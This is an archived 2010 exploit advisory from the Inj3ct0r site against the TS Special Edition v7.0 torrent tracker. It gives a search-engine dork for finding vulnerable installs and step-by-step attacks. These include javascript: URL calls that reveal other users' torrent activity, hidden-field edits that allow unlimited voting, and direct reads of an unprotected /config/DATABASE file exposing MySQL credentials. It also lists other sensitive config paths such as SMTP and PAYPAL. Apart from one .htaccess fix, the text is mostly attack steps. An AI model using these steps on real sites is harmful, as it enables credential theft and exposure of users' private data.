TS Special Edition <= v.7.0 Multiple Vulnerabilities
Posted on 18 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>TS Special Edition <= v.7.0 Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== TS Special Edition <= v.7.0 Multiple Vulnerabilities ==================================================== ############################################################################################## # # TS Special Edition <= v.7.0 Multiple Vulnerabilities # Dork: "Powered by TS Special Edition" # Site: http://templateshares.net # Download: http://templateshares.net/special/purchase # # Author: IHTeam # ############################################################################################## # # See any seed/leech files of any users # # 1) Open any userdatail you want (Ex: /userdetails.php?id=1) # 2) Paste in url bar this code for: # 2.1) javascript:TSAjaxRequest('showuploaded'); <---- See Uploaded Torrent # 2.2) javascript:TSAjaxRequest('showcompleted'); <---- See Completed Torrent # 2.3) javascript:TSAjaxRequest('showleechs'); <---- See In Leech Torrents # 2.4) javascript:TSAjaxRequest('showseeds'); <---- See In Seed Torrents # 2.5) javascript:TSAjaxRequest('showsnatches'); <---- See Recently Downloaded # ############################################################################################## # # Bypass Vote System # # 1) Open any torrent file datail (Ex: /details.php?id=1) # 2) Edit HTML Source code with FireBug or Opera # 3) Search 'form id="quickrate"' and edit these information: # 3.1) <input type="hidden" value="CHAGE_YOUR_ID_HERE" name="userid"> # 3.2) javascript:TSQuickRate('torrent_1', 'CHAGE_YOUR_ID_HERE'); # 4) Apply changes and vote the torrent every time you want # ############################################################################################## # # MySQL Credential # # You can see MySQL Credential by opening /config/DATABASE # # Ex: www.mysite.com/config/DATABASE # a:4:{s:10:"mysql_host";s:9:"HOSTNAME_OF_MYSQL_DATABASE";s:10:"mysql_user";s:11:"USERNAME_OF_MYSQL" # ;s:10:"mysql_pass";s:10:"PASSWORD_OF_MYSQL";s:8:"mysql_db";s:21:"DATABASE_NAME";} # # It can be fixed adding .htaccess in /config/ directory ############################################################################################## # # Others configuration files # # 1) /config/WAITSLOT # 2) /config/TWEAK # 3) /config/THEME # 4) /config/STAFFTEAM # 5) /config/SMTP # 6) /config/SEO # 7) /config/SECURITY # 8) /config/REDIRECT # 9) /config/PJIRC # 10) /config/PAYPAL # 11) /config/MAIN # 12) /config/KPS # 13) /config/FORUMCP # 14) /config/EXTRA # 15) /config/DATETIME # 16) /config/CLEANUP # 17) /pjirc/pjirc.cfg # ############################################################################################## # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
